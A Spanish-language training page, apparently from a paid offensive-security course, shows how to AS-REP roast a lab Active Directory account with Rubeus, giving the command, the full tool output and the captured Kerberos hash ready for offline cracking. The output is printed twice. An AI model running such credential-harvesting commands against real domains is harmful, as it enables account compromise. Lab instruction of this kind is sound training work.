Utilizando Rubeus

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

El comando para explotar esta vulnerabilidad utilizando Rubeus.exe seria:

PS C:\Users\admin\Desktop> .\Rubeus.exe asreproast /user:asrep.user /format:hashcat /outfile:hashes.asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: AS-REP roasting

[*] Target User            : asrep.user
[*] Target Domain          : spartancybersec.corp

[*] Searching path 'LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(samAccountName=asrep.user))'
[*] SamAccountName         : asrep.user
[*] DistinguishedName      : CN=asrep.user,CN=Users,DC=spartancybersec,DC=corp
[*] Using domain controller: First-DC.spartancybersec.corp (10.0.1.100)
[*] Building AS-REQ (w/o preauth) for: 'spartancybersec.corp\asrep.user'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Users\admin\Desktop\hashes.asreproast

[*] Roasted hashes written to : C:\Users\admin\Desktop\hashes.asreproast
PS C:\Users\admin\Desktop> type .\hashes.asreproast
$krb5asrep$23$asrep.user@spartancybersec.corp:0939461A3CF12B34FC2EEDE8C8154E15$55613643FA62AB315871CFD9B90978AB2D34E6F5A5AE07DF827052F7F1F8D81B5DD83B9A6EB237352E08324CCAB0B4C791ADBFF0C7FC0F20011B07F35A56FBE30416C9DB7842410EDF0A7BDC6DFAD646A58197A678256C897D8F1F75B1650978C2E11BCE9630A63A725B2CA24F16F2C2367A915003493E6E76CA0B4173179AB4CAEF4AA201D9594057A9EDDAEF281EE4413E4861DCD187D503DFC860BB07B3A18E6D97B38ABDAAAA5F578A5CCC2B5A25969EFF8943F03C5D6A0E092CBD161D62765CF8E5E7303AAB67AD641A74CF8914722C3352045EDEDD15742C69792CCCD6F3EE74316D9BDE486829C06003A5701C3A52E7742897B286BAF6AEAE

AnteriorASREProastable SiguienteUtilizando CrackMapExec

Última actualización hace 9 meses

¿Te fue útil?

PS C:\Users\admin\Desktop> .\Rubeus.exe asreproast /user:asrep.user /format:hashcat /outfile:hashes.asreproast ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.3 [*] Action: AS-REP roasting [*] Target User : asrep.user [*] Target Domain : spartancybersec.corp [*] Searching path 'LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)(samAccountName=asrep.user))' [*] SamAccountName : asrep.user [*] DistinguishedName : CN=asrep.user,CN=Users,DC=spartancybersec,DC=corp [*] Using domain controller: First-DC.spartancybersec.corp (10.0.1.100) [*] Building AS-REQ (w/o preauth) for: 'spartancybersec.corp\asrep.user' [+] AS-REQ w/o preauth successful! [*] Hash written to C:\Users\admin\Desktop\hashes.asreproast [*] Roasted hashes written to : C:\Users\admin\Desktop\hashes.asreproast PS C:\Users\admin\Desktop> type .\hashes.asreproast $krb5asrep$23$asrep.user@spartancybersec.corp:0939461A3CF12B34FC2EEDE8C8154E15$55613643FA62AB315871CFD9B90978AB2D34E6F5A5AE07DF827052F7F1F8D81B5DD83B9A6EB237352E08324CCAB0B4C791ADBFF0C7FC0F20011B07F35A56FBE30416C9DB7842410EDF0A7BDC6DFAD646A58197A678256C897D8F1F75B1650978C2E11BCE9630A63A725B2CA24F16F2C2367A915003493E6E76CA0B4173179AB4CAEF4AA201D9594057A9EDDAEF281EE4413E4861DCD187D503DFC860BB07B3A18E6D97B38ABDAAAA5F578A5CCC2B5A25969EFF8943F03C5D6A0E092CBD161D62765CF8E5E7303AAB67AD641A74CF8914722C3352045EDEDD15742C69792CCCD6F3EE74316D9BDE486829C06003A5701C3A52E7742897B286BAF6AEAE